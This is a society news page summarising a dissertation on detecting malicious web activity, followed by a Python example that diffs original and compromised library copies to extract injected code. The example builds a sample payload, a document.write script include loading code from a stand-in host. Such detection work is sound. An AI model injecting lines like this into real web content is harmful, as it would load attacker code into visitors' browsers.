NEWS AND RESOURCES FOR MEMBERS OF THE IEEE SIGNAL PROCESSING SOCIETY

Zhou Li (Indiana University) "Understanding and detecting malicious web activities" (2014)

Zhou Li, Indiana University, "Understanding and detecting malicious web activities", Advisor: Wang XiaoFeng, 2014

The technological progress in today's Web not only fosters a booming Web industry, but also provides new opportunities to criminals who are industrializing their dark business. Capturing the malicious activities launched by attackers is not a trivial task, as attackers' strategies are becoming increasingly sophisticated. In this dissertation research, the author performed a large-scale, systematic study of the behaviors and strategies of web attackers and developed three new techniques for detecting malicious activities in different scenarios.

The author first studied an emerging threat in which the attacker abuses the online advertising channel to deliver malicious content to the web client. To mitigate the threat, the author leveraged the topological properties underlying the delivery of malicious ads and built a detector that can automatically catch the malicious activities.

The author further studied malicious Web infrastructure, which reveals the existence of dedicated malicious hosts that play orchestrating roles in malicious activities. In this research, the author identified their distinctive topological features and developed a detection technique to identify them at large scale.

Finally, the author examined an attack against vulnerable websites, in which the adversary compromises vulnerable sites and injects redirection scripts that bring visitors to malicious sites. The study shows that attackers blindly place their attack payloads on various web content, including copies of popular open-source libraries. By comparing those libraries' original copies with compromised ones, the author built a new technique capable of extracting malicious content at large scale.

For details, please contact the author or visit the thesis page.
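The comparison of an original library copy with a served copy, described in the abstract above, can be illustrated with a token-level diff. This is an added example, not the dissertation's implementation: the function names, the sample library and the `injected.example.invalid` host are constructed, and it assumes the matching clean version of the library is already at hand.

```python
import difflib
import re

# Quoted strings, identifiers/numbers, or any single non-space character.
TOKEN = re.compile(r'''"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'|\w+|\S''')

def tokenize(source):
    """Return (text, start, end) per token; whitespace is discarded so
    reformatting or re-minifying a library does not register as a change."""
    return [(m.group(), m.start(), m.end()) for m in TOKEN.finditer(source)]

def extract_injected(original, suspect, min_tokens=3):
    """Return the source spans of `suspect` whose tokens are absent from
    `original` (hypothetical helper; runs under min_tokens are ignored)."""
    a = [t[0] for t in tokenize(original)]
    spans = tokenize(suspect)
    b = [t[0] for t in spans]
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    found = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace") and j2 - j1 >= min_tokens:
            # Slice the suspect text so the payload is reported verbatim.
            found.append(suspect[spans[j1][1]:spans[j2 - 1][2]])
    return found

# Constructed sample: a tiny "library" standing in for a popular one.
ORIGINAL = """(function (w) {
  function each(list, fn) {
    for (var i = 0; i < list.length; i++) { fn(list[i], i); }
  }
  w.tiny = { each: each, version: "1.0.2" };
})(window);
"""

# Constructed payload of the kind the abstract describes (script include).
INJECTED = ("document.write('<script src=\"http://injected.example.invalid"
            "/r.js\"></script>');")

# A clean copy as a site might serve it: same code, whitespace collapsed.
REFORMATTED = " ".join(ORIGINAL.split())
# The compromised copy: the reformatted library with the payload appended.
COMPROMISED = REFORMATTED + "\n" + INJECTED + "\n"

if __name__ == "__main__":
    print(extract_injected(ORIGINAL, REFORMATTED))   # no differences
    print(extract_injected(ORIGINAL, COMPROMISED))   # the appended payload
```

A legitimate version upgrade also shows up as a difference, so the comparison is only meaningful against the same release of the library that the site claims to serve.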